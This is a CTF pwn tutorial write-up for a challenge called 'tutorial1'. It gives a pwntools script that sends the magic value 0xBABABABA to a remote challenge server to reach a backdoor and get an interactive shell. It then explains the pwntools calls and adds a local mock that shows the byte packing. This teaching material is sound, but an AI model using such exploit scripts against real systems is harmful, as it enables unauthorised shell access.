PwnTheBox,Pwn:tutorial1
2022-06-10 22:01:00 【Part 02】

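Analysis: when the value stored in buf is 0xBABABABA (hexadecimal), the backdoor function is called.

The backdoor function contains command execution: system can be used to get a shell.
In summary, the payload is 0xBABABABA.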
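exp:

```python
from pwn import *  # pwntools

context(log_level='debug')  # print the full I/O exchange
p = remote('redirect.do-not-trust.hacking.run', 10146)
payload = 0xBABABABA  # value that makes the program call backdoor
p.sendline(p64(payload))  # packed as 8 little-endian bytes, plus '\n'
p.recv()
p.interactive()
```

- context(os='linux', arch='amd64', log_level='debug')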
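1. os sets the operating system to Linux; most pwn challenges in CTFs run on Linux.
2. arch sets the architecture to amd64, which can simply be read as 64-bit mode; the corresponding 32-bit mode is 'i386'.
3. log_level sets the logging level to debug. This is usually set while debugging, so that pwntools prints the complete I/O exchange, which makes debugging easier and helps avoid I/O-related mistakes when solving CTF challenges.
- remote: module for connecting to a remote server.
- sendline(data): sends one line of data, which is the same as appending \n to the data.
- recv(numb=size in bytes, timeout=default): receives the specified number of bytes.
- interactive(): used after a shell has been obtained; interacts directly, which is the same as returning to shell mode.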
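How the bytes from `p64` and `sendline` reach the comparison, as an added example that is not part of the original post. It uses only the standard library (`struct` stands in for pwntools' `p64`/`p32`), and `mock_service` is a constructed model that assumes the program reads up to 8 bytes into a zeroed buf and compares them as a little-endian 64-bit integer.

```python
import socket
import struct

MAGIC = 0xBABABABA  # value from the write-up


def p64(value):
    """Stand-in for pwntools' p64: 8 bytes, little-endian (amd64 order)."""
    return struct.pack("<Q", value)


def p32(value):
    """Stand-in for pwntools' p32: 4 bytes, little-endian."""
    return struct.pack("<I", value)


def mock_service(sock):
    """Constructed model (assumption): read up to 8 bytes into a zeroed
    buf and compare it, as a 64-bit little-endian integer, with MAGIC."""
    buf = sock.recv(8).ljust(8, b"\x00")
    matched = struct.unpack("<Q", buf)[0] == MAGIC
    sock.sendall(b"backdoor reached\n" if matched else b"no match\n")
    return buf


def run(data):
    """Send data the way sendline() does (data + newline) over a local
    socket pair and return (buf seen by the service, reply received)."""
    client, server = socket.socketpair()
    try:
        client.sendall(data + b"\n")      # sendline appends \n
        buf = mock_service(server)
        return buf, client.recv(64)       # recv: up to 64 bytes
    finally:
        client.close()
        server.close()


if __name__ == "__main__":
    for label, data in [("p64", p64(MAGIC)),
                        ("p32", p32(MAGIC)),
                        ("ascii", b"0xBABABABA")]:
        buf, reply = run(data)
        print(f"{label:5} buf={buf.hex()} reply={reply!r}")
```

In the p32 case the newline appended by sendline lands inside the 8-byte buffer, so under this model the 64-bit comparison fails; the ASCII text "0xBABABABA" never matches because the comparison is on raw bytes, not on text.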
The exploit works; list the directory.

Got the flag.
